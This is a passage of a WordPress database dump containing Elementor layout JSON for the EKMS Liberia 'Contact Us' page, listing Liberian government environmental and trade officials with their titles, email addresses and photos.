image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24365,3590,'_elementor_edit_mode','builder'),(24366,3590,'_elementor_template_type','wp-page'),(24367,3590,'_elementor_version','3.0.16'),(24368,3590,'_wp_page_template','default'),(24369,3590,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\